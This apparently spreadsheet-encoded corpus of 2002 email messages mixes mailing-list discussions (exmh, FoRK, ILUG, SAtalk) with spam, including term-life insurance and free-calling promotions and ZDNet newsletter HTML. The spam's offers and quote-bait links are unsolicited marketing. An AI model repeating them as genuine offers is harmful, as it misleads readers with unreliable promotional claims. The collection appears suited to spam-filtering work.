               Certain-T 20-year is non-participating term life insurance =
 to age=20
               95, policy form S-3224, underwritten by Federal Kemper =
 Life Assurance=20
               Company (FKLA), a Zurich Life Company, Schaumburg, IL =
 60196-6801.=20
               Premier means no tobacco use of any kind in the past 60 =
 months.=20
               Premiums include the annual policy fee; $50.00. Suicide =
 and other=20
               limits may apply. Forms and policy provisions vary by =
 state. Policy=20
               not available in all states. Companion policies not =
 available in=20
               NJ.&lt;/font&gt;&lt;/p&gt;
             &lt;/font&gt;=20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message.&lt;br&gt;
         Instead, go here: &lt;a =
 href=3D"http://www.Insurancemail.net"&gt;http://www.Insurancemail.net&lt;/a&gt;&lt;/f=
 ont&gt;&lt;/p&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;center&gt;
   &lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"1"&gt;&lt;a =
 href=3D"http://www.insuranceiq.com/legal.htm"&gt;Legal Notice&lt;/a&gt;&lt;/font&gt;=20
 &lt;/center&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_0007_01C1F9BE.12E451A0--
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_-2067045721P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Chris Garrigues &lt;cwg-bcc@DeepEddy.Com&gt;
 &gt; Date:  Wed, 21 Aug 2002 10:15:18 -0500
 &gt;
 &gt; &gt; From:  Valdis.Kletnieks@vt.edu
 &gt; &gt; Date:  Wed, 21 Aug 2002 02:36:56 -0400
 &gt; &gt;
 &gt; &gt; --==_Exmh_778588528P
 &gt; &gt; Content-Type: text/plain; charset=us-ascii
 &gt; &gt; 
 &gt; &gt; On Tue, 20 Aug 2002 22:51:52 EDT, Valdis.Kletnieks@vt.edu said:
 &gt; &gt; 
 &gt; &gt; &gt; Ever tried to get MH to *not* have a 'pseq' sequence?  I suspect everyb
 &gt; od
 &gt; &gt; y's
 &gt; &gt; &gt; looking at a big box that has unseen and pseq in it.  Might want to add
 &gt; &gt; &gt; 'pseq' to the 'hide by default' list....
 &gt; &gt; 
 &gt; &gt; Was it intended that if you added a sequence to the 'never show' list tha
 &gt; t
 &gt; &gt; it not take effect till you stopped and restarted exmh?  I added 'pseq',
 &gt; &gt; then hit 'save' for Preferences - didn't take effect till I restarted.
 &gt; 
 &gt; No it wasn't, and at one point it worked fine.  I'll check and see why it 
 &gt; stopped working.
 Ah....I think this may be a user error.  If you change the field in the 
 preferences window the variable doesn't actually change unless you press 
 return.  If you merely click elsewhere, nothing happens.
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_-2067045721P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9Y7llK9b4h5R0IUIRAn1UAJ9QeXRMZ2Bisp/apMknW7cTMweAeACePtOK
 MjOpAc2YKCDHawR3bJpOstk=
 =Um7T
 -----END PGP SIGNATURE-----
 --==_Exmh_-2067045721P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">
 -----Original Message-----
 From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of
 Robert Harley
 Sent: Monday, September 02, 2002 2:55 AM
 To: fork@spamassassin.taint.org
 Subject: RE: Java is for kiddies
 Reza B'Far wrote:
 &gt;This thread kind of surprises me... I started coding with C, then C++, and
 &gt;moved on to Java... And, I think that:
 Robert Harley wrote:
 &gt;Looks like a case of "MY experience is comprehensive, YOUR'S is
 &gt;anecdotal, THEY don't know what they're talking about".
 Well, I sure don't claim that... I think most people on Fork probably have
 more programming knowledge than I do... There's lots of experience out
 here...
 Reza B'Far wrote:
 &gt;1.  The people who pay the wages don't give a flyin' heck what programming
 &gt;language you write things in... they just want it to work.
 Robert Harley wrote:
 &gt;In my experience, they do care.  It has to work certainly, and in
 &gt;particular it has to work with what they've already got, and it has to
 &gt;work on client's systems.
 &gt;My limited experience of Java started a few years ago when support on
 &gt;Linux was so terrible that I ran away screaming and haven't come back yet.
 Well, I think until recently, support for most things on Linux was kind of
 shady... Things have got much better... You're right in that the JDK used to
 suck on Linux... But then, IMHO, Linux is still maturing.... or at least
 development tools for Linux are maturing... I've been developing a few
 server side apps that run on Linux recently with JDK 1.3.x and they've had
 no problems with great performance.
 Robert Harley worte:
 &gt;Microsoft has announced that they plan to remove Java from Windows.
 &gt;They took it out of XP already and it has to be installed with a
 &gt;service pack.  Somehow, I can't imagine them removing the ability to
 &gt;run C programs.
 Hmmm... Do you really think that MS is pulling out Java because it's a "Bad"
 programming language or application platform?  You don't think this has
 anything to do with .NET being a competitor to Java do you?  Or that MS has
 basically copied Java (with some additional features) and called it C#?
 Isn't that alone an indication that they actually DO think that a VM is the
 right way to go for most high level applications?
 Reza B'Far wrote:
 &gt;2.  C and C++ forces the developer to solve problems such as memory
 &gt;management over and over again.
 Robert Harley wrote:
 &gt;Can't say I spend any noticeable amount of time on memory management
 &gt;issues, apart from the fact that I frequently need &gt; 4 GB.
 Hmmm again.... You're telling me that you've never had a nasty bug that took
 you a couple of days to track down that had to do with a memory leak?  I am
 not the best C/C++ programmer... not even close... But I've known really
 good ones... and even they have nasty bugs that have to do with memory
 management, however occasional they may be.
 &gt;It's about design patterns, architecture, high level stuff...
 Robert Harley wrote:
 &gt;If your problem just requires application of a "design pattern" to solve,
 &gt;then it's trivial anyway irrespective of language.
 Wow!  So you're telling me that unless the application involves
 bit-counting, it's trivial?  What about the application itself?  What about
 high level problems such as task distribution, work-flow, etc.?  Aren't most
 high level problems solved with high level solutions like design patterns?
 Or do you solve high level problems by writing optimal C/C++ code?  For
 example, do you think that most people working on collaboration frameworks
 (there are lots of them on this list), are working on writing an operating
 system with assembly that provides for a collaborative environment?
 &gt;I am amazed by the amount of time wasted by people talking about low
 &gt;level problems that have been solved 10 million times over and over
 &gt;and over again...
 Robert Harley wrote:
 &gt;You appear to be gratuitously asserting that C programmers waste time
 &gt;on irrelevant low-level problems and Java programmers don't.  Depends
 &gt;entirely on the programmer, not the language.
 I can see how you could infer this. However, what I believe to really be the
 case is that Java is one of the best languages for writing large
 applications with many components that involves the collaboration of more
 than three programmers.  In those cases, it's always very hard to get the
 programmers to agree on API's, memory management techniques, etc.  With
 Java, the JCP takes care of the discussions so that you don't sit around in
 a long meeting trying to decide what API to use to hook up to a database
 (JDBC) or a messaging bus (JMS).
 &gt;3.  Java is not just a programming language! It's also a platform...
 Robert Harley wrote:
 &gt;Buzzword.
 YIKES!  Have you written db code with C/C++ for different databases (just an
 example)?  Tried porting a persistence layer from Windows to Unix?  Say you
 have Informix running on Solaris and you want to port to Windows with MS SQL
 (bad idea...but for the sake of the example), would you rather deal with
 JDBC port or C/C++ port that uses Informix drivers and now you have to use
 ODBC?
 &gt;a monolithic set of API's or a crap load of different API's slicing
 &gt;and dicing the same problems 50 different ways?
 Robert Harley wrote:
 &gt;Unsupported assertion.
 So, are you saying that there is a standard set of API's for C/C++ for
 everything? (aside to the minimal ANSI stuff).  Is there a standard way of
 dealing with C/C++ applications for various domain problems (messaging,
 database persistence, etc.) that rivals Java?  I'd like to know if there is
 one accepted by everyone who writes C/C++... In that case, I claim
 ignorance...
 Not suggesting that Java is the golden hammer.... Just that C/C++ is
 overkill for most things... I even coded in VB... But VB is a true disgrace
 to programming... It's just lame... Java is Object Oriented... (no
 flame-mail from the anti-OO people please... that is a religious
 discussion...) and relatively clean... And I don't think that every "Kid"
 can write a well designed Java program.  Kids typically don't understand
 various design patterns and principles... To my experience, they actually
 tend to think more of the low level problems, wanting to rewrite and
 reinvent the world... a tendency that is much more possible, IMHO, in C/C++
 than in Java due to existence of standard API's.
</t>
  </si>
  <si>
    <t xml:space="preserve">
 "Gordon Mohr" said:
 &gt; If you plan to spend most of your time in that broke/
 &gt; unemployed/unexceptional mode, please, leave North America 
 &gt; for Scandinavia. 
 hmm, I might, at least they've got affordable DSL there, and haven't
 signed a DMCA-like law yet ;)
 --j.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Save up to 75% on Term Life...                  LEKOT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</si>
  <si>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href=3D"http://www.marketing-leader.com/user0202/termquotes/473400/index.h=
 tm"&gt;&lt;font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href=3D"http://www.marketing-leader.com/user0202/termquotes/473400/index.h=
 tm"&gt;&lt;font
 face=3D"arial"
 size=3D"5"&gt;
 &lt;b&gt;GET A FREE QUOTE NOW!&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;
 &lt;br&gt;
 &lt;font face=3D"arial" size=3D"2" color=3D"#000000"&gt;
 &lt;i&gt;You can't predict the future, but you can always
 prepare for it.&lt;/i&gt;&lt;/font&gt;
 &lt;/center&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;br&gt;&lt;br&gt;
 &lt;font face=3D"arial,verdana" size=3D1.5 color=3D"#8182AB"&gt;&lt;p
 align=3D"center"&gt;&lt;br&gt;&lt;br&gt;
 &lt;a
 href=3D"http://www.marketing-leader.com/light/watch.asp"&gt;to be
 excluded from future contacts &lt;/a&gt;&lt;/p&gt;&lt;/font&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 cocol
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Hello Unlimited International Telephone Call Marketer,
 If you ordered a flat-rate domestic calling product or a 20 minute free trial using a local access number, your service will be operating in about 24-48 hours or on your designated trial date and time.  Please try dialing the access number you found on your reseller's web page at:
 http://www.internationalfreecall.com
 If you ordered a flat-rate domestic calling product using a 1-800 toll-free access number, your service will be operating within 1-2 work days.
 Please try dialing 1-866-865-4548.
 In either case, when your service is switched on, you will hear a voice ask you to dial the number you are calling.
 You must dial 1+area code+7 digit number followed by # to make any calls: local or long distance.
 Example - To call www.internationalfreecall.com, you would dial the following after dialing your access number and listening for the voice:
 1-410-608-8178# 
 Please use this service for all your calling and you will never pay more than your monthly fee again. There are no taxes or surcharges, so dial away!
 Finally, I recommend entering the access number into your speed dial settings on your telephone.  This will make your service quicker and easier to use, and thus more enjoyable.
 If you have any questions, please contact us for more information.
 In addition, if you need product enhancements like 3-way calling, portable calling cards, international calling products, or marketing tools, please visit:
 http://www.internationalfreecall.com
 In the meantime, the other network on this free calling promotion is OPEX, which is offering 100 minutes of free long distance for trying their program.  
 Opex's usual rates are 4.5 cents per minute for domestic calls, with great international rates, too!
 For more information on OPEX, or to sign up, please click below:
 http://cognigen.net/opex/main.cgi?lietuva
 To unsubscribe from this mailing list, please click on:
 http://www.internationalfreecall.com/cgi-bin/aefs/subscribe.cgi?user=info&amp;listid=1.list&amp;id=1676
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] whitelisting mailing lists
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Ross Vandegrift said:
 &gt; Won't this whitelist spams sent to mailing lists though?
 only if you've whitelisted the mailing list.  In that case, c'est la vie
 ;)
 --j.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</si>
  <si>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2000+ year old Greek computer reinterpreted
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85507259
 Date: Not supplied
 The Antikythera mechanism, recovered off a sunken ship in Greece in 1900, is 
 thought to be a clockwork device to calculate the orbits of the celestial 
 bodies. New analysis of the remaining fragments shows that it was wicked-cool: 
     The Greeks believed in an earth-centric universe and accounted for 
     celestial bodies' motions using elaborate models based on epicycles, in 
     which each body describes a circle (the epicycle) around a point that 
     itself moves in a circle around the earth. Mr Wright found evidence that 
     the Antikythera mechanism would have been able to reproduce the motions of 
     the sun and moon accurately, using an epicyclic model devised by 
     Hipparchus, and of the planets Mercury and Venus, using an epicyclic model 
     derived by Apollonius of Perga. (These models, which predate the mechanism, 
     were subsequently incorporated into the work of Claudius Ptolemy in the 
     second century AD.) 
     A device that just modelled the motions of the sun, moon, Mercury and Venus 
     does not make much sense. But if an upper layer of mechanism had been 
     built, and lost, these extra gears could have modelled the motions of the 
     three other planets known at the timeMars, Jupiter and Saturn. In other 
     words, the device may have been able to predict the positions of the known 
     celestial bodies for any given date with a respectable degree of accuracy, 
     using bronze pointers on a circular dial with the constellations of the 
     zodiac running round its edge.  
 Link[1] Discuss[2] (_Thanks, Mark!_)
 [1] http://www.economist.com/displaystory.cfm?story_id=1337165
 [2] http://www.quicktopic.com/boing/H/UKW9AAQCsFibH
</t>
  </si>
  <si>
    <t xml:space="preserve">On (21/08/02 12:42), Kiall Mac Innes didst pronounce:
 &gt; 
 &gt; Hi i have a phillips head skrew thats holding a circut board together i need
 &gt; to take it out ASAP and nothing will work, the threads on the skrew are
 &gt; almost completly gone, its is a very small skrew that i have to use a
 &gt; percision skrewdriver set to remove the skrews any help would be
 &gt; appreaciated...
 &gt; 
 Try a hammer -- great precision tool that!!
 -- 
 Chat ya later,
 John.
 --
 BOFH excuse #167: excessive collisions &amp; not enough packet ambulances
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: IT "fossils"
</t>
  </si>
  <si>
    <t xml:space="preserve">While wandering through Uppsala, Sweden last week, I ran across the
 "Keramik" studio of Paula von Freymann. Her pottery work has the theme of
 "fossils for the future", and she has two main lines of this work. One is
 more conventional, taking leaves from plants at the nearby Linneas Gardens
 and impressing them into the clay before firing, leaving a "fossil" of the
 plant.
 The other is more unique, taking imprints of circuit boards, cellular
 telephones, punched cards, etc. and then firing the result to make "IT
 fossils." Given how quickly most of our work becomes obsolete, I found the
 offbeat notion of IT fossilization an oddly fitting way of archiving the
 physical detritus of the digital age.
 http://www.kuai.se/~itart/
 http://www.kuai.se/~itart/html/gallery1.htm
 http://www.kuai.se/~itart/bildhtml/4.htm
 My guess is she'd gladly make fossils of any object you wanted, for a price.
 Could be an interesting memorial of your next product launch!
 - Jim
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Samba login question
</t>
  </si>
  <si>
    <t xml:space="preserve">I have a situation with a small network as follows:
 A number of client workstations which are running VMware, each of which will
 run a local copy of Samba (not the VMware autoinstalled version) to let
 VMware access local linux disks.
 An NIS/NFS server which will also run Samba to allow the VMware clients
 access to its filesystems.
 How can I set things up so that all the VMware clients (all running 'doze
 98, possibly being upgraded in future to W2K) authenticate against the NIS
 server's Samba ? I have read the Samab documentation in  large quantities
 down through the years but as I've never wanted to do anything like this, I
 never paid much attention to all the stuff about domain controllers etc.
 which I presume is what I will need to have running here.
 I would also like, if at all possible, to have synchronisation of passwords
 between the NIS domain and the NIS server's Samba with minimal manual
 intervention.
 Ideas, accompanied by annotated Samba configration files :-) , gratefully
 received.
 Niall
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, Aug 29, 2002 at 07:33:44PM -0400, cmeclax po'u le cmevi'u ke'umri wrote:
 &gt; 
 &gt; Was it sent in HTML? If so, and it had a background, the background may have 
 &gt; been sent in a spam.
 razor-agents 2.14 needs all parts to be spam to make a positive decision
 (though this will change with the next release), so it couldn't have been
 a background. Could you send me the debug log?
 cheers,
 vipul.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</si>
  <si>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=3D7f-bn6KIIPiqbN5uSE9IO3JewkhBpuR" &gt;&lt;img src=3D"http://www.zdnet.com/graph=
 ics/newsletters/hd_anchor.gif" width=3D"440" height=3D"60" border=3D"0"  al=
 t=3D"AnchorDesk Daily"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=3D160 align=3Dcenter valign=3Dtop rowspan=3D2 bgcolor=3D"#ffffff"=
 &gt;
         &lt;br&gt;
         &lt;!--tower --&gt;
       &lt;iframe src=3D"http://www.zdnet.com/include/ads/ifc/RGROUP=3D2766" sc=
 rolling=3D"no" frameborder=3D"0" hspace=3D"0" vspace=3D"0" height=3D"600" w=
 idth=3D"160" marginheight=3D"0" marginwidth=3D"0"&gt;
 &lt;script language=3D"JavaScript" src=3D"http://www.zdnet.com/include/ads/js/=
 RGROUP=3D2766"&gt;
 &lt;/script&gt;
 &lt;/iframe&gt;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href=3D"http://clickthru.online.com/Click?q=3D94-rOVNQaI=
 qkuwF6HqJ5elUjfr5JQyR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Acer brings P4 power to the people--read the review at ZDNet.&lt;/b&gt;&lt;/font&gt;&lt;/a=
 &gt;&lt;br&gt; &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" heig=
 ht=3D"6"&gt;&lt;br&gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3Daa-gBteQXU=
 Q1tMV2muWLXZBXqONOVnR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Download Builder.com's 'Remedial XML' series.&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;br&gt; &lt;img src=
 =3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" height=3D"6"&gt;&lt;br&gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3Dbf-JtRfQ8Z=
 Qw9xW4Dr5w8PF_jEuwteR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Need a memory upgrade? Find out with CNET's Memory Configurator.&lt;/b&gt;&lt;/font&gt;=
 &lt;/a&gt;&lt;br&gt; &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" h=
 eight=3D"6"&gt;&lt;br&gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3Dd4-E0SqQ0E=
 HePqjJ6V_4Mc3148lk6yR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Tech Update: Put a lid on CRM costs with self-service.&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;br&gt; &lt;=
 img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" height=3D"6=
 "&gt;&lt;br&gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3De9-gdzpQxV=
 IgR30E1fTRnU3P83P5XlR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Check out thousands of IT job listings in ZDNet's Career Center.&lt;/b&gt;&lt;/font&gt;=
 &lt;/a&gt;&lt;br&gt; &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" h=
 eight=3D"6"&gt;&lt;br&gt;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&gt;MON JUL 22,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ck?q=3Dfe-xkIgQwgsVwy4pFLeE4rbg6amtI4R" &gt;&lt;b&gt;How Microsoft plans to take ove=
 r your living room&lt;/A&gt;&lt;/B&gt;&lt;/font&gt;&lt;br&gt;&lt;img src=3D"http://www.zdnet.com/graph=
 ics/clear.gif" width=3D"1" height=3D"4"&gt;&lt;br&gt;
                 MS's upcoming Windows XP Media Center Edition does more tha=
 n add a personal video recorder and a new interface to the OS. It could be =
 the opening salvo in the company's bid to control home entertainment. Let m=
 e explain.&lt;p&gt;
         =20
        =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D13-NxSZI3X=
 PQYRi3FMssDLfzpHOCerR" &gt;&lt;b&gt;PLUS: AnchorDesk Radio: How to fight the World W=
 ide Wait&lt;/b&gt; &lt;/a&gt;&lt;br&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/f=
 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href=3D"http://clickthru.online.com/Click?q=3D29-Sg_rIjM3x2pnfqs=
 NyGEI9rCM8vlR" &gt;Gates tells all... Cheap PCs from Gateway... Sony's tiny di=
 gicam &lt;/a&gt;&lt;p&gt;
         =20
        =20
         &lt;a href=3D"http://clickthru.online.com/Click?q=3D3e-F51nIizcfE6SHq3=
 _7DQESNPe-i4R" &gt;Wanna speed up your dial-up Web surfing? Here's how &lt;/a&gt;&lt;p&gt;
         =20
        =20
                =20
         &lt;a href=3D"http://clickthru.online.com/Click?q=3D53-n86dINniB4o0XxZ=
 jHpx8lOheMncR" &gt;Hey thief! You just TRY stealing this notebook&lt;/a&gt;&lt;p&gt;
                =20
                =20
         &lt;a href=3D"http://clickthru.online.com/Click?q=3D68-iM8qIsPWu1nmzpp=
 ywvjsK-FdLPRR" &gt;What's new in reviews: The latest eMac--and more&lt;/a&gt;&lt;p&gt;
                =20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
 ing=3D"0" border=3D"0" bgcolor=3D"#ffffff"&gt;      &lt;tr bgcolor=3D"#999999"&gt;&lt;t=
 d colspan=3D"7" height=3D"15"&gt;&lt;font face=3D"ms sans serif, geneva" color=3D=
 "#ffffff" size=3D"-2"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/=
 frontpage/b.gif" height=3D1 width=3D3&gt;&lt;b&gt;Crucial Clicks: More from ZDnet&lt;/b=
 &gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;      &lt;tr&gt;      &lt;td bgcolor=3D"#999999" rowspan=3D"3"&gt;&lt;im=
 g src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=
 =3D1 width=3D1&gt;&lt;/td&gt;      &lt;td rowspan=3D"3"&gt;&lt;img src=3D"http://www.zdnet.co=
 m/graphics/anchordesk/frontpage/b.gif" height=3D1 width=3D5&gt;&lt;/td&gt;      &lt;td =
 colspan=3D"3"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpag=
 e/b.gif" height=3D5 width=3D1&gt;&lt;/td&gt;      &lt;td rowspan=3D"3"&gt;&lt;img src=3D"http=
 ://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3D1 width=3D5&gt;=
 &lt;/td&gt;      &lt;td bgcolor=3D"#999999" rowspan=3D"3"&gt;&lt;img src=3D"http://www.zdn=
 et.com/graphics/anchordesk/frontpage/b.gif" height=3D1 width=3D1&gt;&lt;/td&gt;     =
  &lt;/tr&gt;      &lt;tr valign=3D"top"&gt;      &lt;td width=3D"100%"&gt;            &lt;table =
 width=3D"100%"  cellpadding=3D"0" cellspacing=3D"0" border=3D"0"&gt;        &lt;t=
 r&gt;&lt;td colspan=3D"3"&gt;&lt;font face=3D"verdana, geneva" color=3D"#333333" size=
 =3D"-2"&gt;&lt;b&gt;Networking&lt;/b&gt;&lt;/font&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.com/grap=
 hics/anchordesk/frontpage/b.gif" height=3D3 width=3D1&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;     =
      &lt;tr valign=3D"top"&gt;       &lt;td width=3D"85"&gt;&lt;a href=3D"http://clickthru=
 .online.com/Click?q=3D7d-FFEqIDLWMooy-OZUywq2NRJSBTZR" &gt;&lt;img src=3D"http://=
 www.zdnet.com/products/graphics/020802wirelss_netwks.jpg" width=3D"85" heig=
 ht=3D"110" border=3D"0" alt=3D"" /&gt;&lt;/a&gt;&lt;/td&gt;              &lt;td width=3D"5"&gt;&lt;=
 img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=
 =3D1 width=3D5&gt;&lt;/td&gt;        &lt;td width=3D"100%"&gt;&lt;font face=3D"arial, helveti=
 ca" size=3D"-1"&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D92-ubRVQTz=
 F9OETxCIzeFOPq1FsnynR" style=3D"text-decoration:none"&gt;&lt;b&gt;An all-purpose WiF=
 i router&lt;/b&gt;&lt;/a&gt; &lt;br /&gt;      Need a router for your wireless network? ZDNet=
  reviewers say the AirPlus DI-614+ offers good speed performance, ease of u=
 se, and exceptional security. &lt;/font&gt;&lt;/td&gt;          &lt;/tr&gt;           &lt;tr&gt;&lt;td=
  colspan=3D"3"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpa=
 ge/b.gif" height=3D3 width=3D1&gt;&lt;br /&gt;&lt;img src=3D"http://techupdate.zdnet.co=
 m/techupdate/i/arrow_blue.gif" width=3D"8" height=3D"10" border=3D"0" alt=
 =3D"" /&gt;&lt;font face=3D"arial, helvetica" size=3D"-1"&gt;&lt;a href=3D"http://click=
 thru.online.com/Click?q=3Da7-fR_2Q8BskK0Y5pILF5vLk7KCgFeR" style=3D"text-de=
 coration:none"&gt;Read review&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;            &lt;/table&gt;      &lt;/=
 td&gt;      &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage=
 /b.gif" height=3D1 width=3D5&gt;&lt;/td&gt;      &lt;td width=3D"180"&gt;           &lt;table=
  cellpadding=3D"0" cellspacing=3D"0" width=3D"180" border=3D"0" bgcolor=3D"=
 #eeeeee"&gt;        &lt;tr bgcolor=3D"#999999"&gt;&lt;td colspan=3D"3" height=3D"15"&gt;&lt;f=
 ont face=3D"ms sans serif, geneva" color=3D"#ffffff" size=3D"-2"&gt;&lt;img src=
 =3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3D1 wi=
 dth=3D3&gt;Most Popular Products&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;              &lt;tr&gt;           =
  &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" =
 width=3D"10" height=3D"1" alt=3D"" border=3D"0" /&gt;&lt;/td&gt;         &lt;td&gt;&lt;font f=
 ace=3D"ms sans serif, geneva" size=3D"-2"&gt;&lt;img src=3D"http://www.zdnet.com/=
 graphics/anchordesk/frontpage/b.gif" width=3D"1" height=3D"5" alt=3D"" bord=
 er=3D"0" /&gt;&lt;br /&gt;            &lt;b&gt;Networking&lt;/b&gt;&lt;br /&gt;&lt;img src=3D"http://www.=
 zdnet.com/graphics/anchordesk/frontpage/b.gif" width=3D"1" height=3D"7" alt=
 =3D"" border=3D"0" /&gt;&lt;br /&gt;              &lt;b&gt;1&lt;/b&gt;. &lt;a href=3D"http://clickt=
 hru.online.com/Click?q=3Dbc-zkPJQ6BMuyEcVcwmobF8XEDxwcyR" style=3D"text-dec=
 oration:none"&gt;Linksys EtherFast wireless AP&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://www=
 .zdnet.com/graphics/anchordesk/frontpage/b.gif" width=3D"1" height=3D"3" al=
 t=3D"" border=3D"0" /&gt;&lt;br /&gt;              &lt;b&gt;2&lt;/b&gt;. &lt;a href=3D"http://click=
 thru.online.com/Click?q=3Dd1-ulOzQpEQ0tYois710-kl0aSxkZlR" style=3D"text-de=
 coration:none"&gt;Linksys EtherFast router&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdn=
 et.com/graphics/anchordesk/frontpage/b.gif" width=3D"1" height=3D"3" alt=3D=
 "" border=3D"0" /&gt;&lt;br /&gt;           &lt;b&gt;3&lt;/b&gt;. &lt;a href=3D"http://clickthru.on=
 line.com/Click?q=3De6-qG8rQwy7yK7EMlcXGugH6NQYvU4R" style=3D"text-decoratio=
 n:none"&gt;Siemens SpeedStream router&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.co=
 m/graphics/anchordesk/frontpage/b.gif" width=3D"1" height=3D"3" alt=3D"" bo=
 rder=3D"0" /&gt;&lt;br /&gt;         &lt;b&gt;4&lt;/b&gt;. &lt;a href=3D"http://clickthru.online.co=
 m/Click?q=3Dfc-WpHmQVwTaZlU4xZa9-0t3VVat9yR" style=3D"text-decoration:none"=
 &gt;NetGear HE102 802.11a wireless AP&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.co=
 m/graphics/anchordesk/frontpage/b.gif" width=3D"1" height=3D"3" alt=3D"" bo=
 rder=3D"0" /&gt;&lt;br /&gt;             &lt;b&gt;5&lt;/b&gt;. &lt;a href=3D"http://clickthru.onlin=
 e.com/Click?q=3D11-l8riI2-aPmyhpxqX3VynhNBuCqlR" style=3D"text-decoration:n=
 one"&gt;Netgear RP614&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.com/graphics/ancho=
 rdesk/frontpage/b.gif" width=3D"1" height=3D"6" alt=3D"" border=3D"0" /&gt;&lt;br=
  /&gt;           &lt;img src=3D"http://techupdate.zdnet.com/techupdate/i/arrow_bl=
 ue.gif" width=3D"8" height=3D"10" border=3D"0" alt=3D"" /&gt;&lt;b&gt;&lt;a href=3D"htt=
 p://clickthru.online.com/Click?q=3D26-KqPVIiMxersUsSnBBBkqU8niQ74R" &gt;More p=
 opular networking products&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;             &lt;img src=3D"http://www=
 .zdnet.com/graphics/anchordesk/frontpage/b.gif" width=3D"1" height=3D"10" a=
 lt=3D"" border=3D"0" /&gt;&lt;br /&gt;            &lt;/font&gt;&lt;/td&gt;            &lt;td&gt;&lt;img s=
 rc=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width=3D"10=
 " height=3D"1" alt=3D"" border=3D"0" /&gt;&lt;/td&gt;         &lt;/tr&gt;           &lt;/tabl=
 e&gt;      &lt;/td&gt;      &lt;/tr&gt;      &lt;tr valign=3D"top"&gt;&lt;td colspan=3D"3"&gt;&lt;img src=
 =3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3D5 wi=
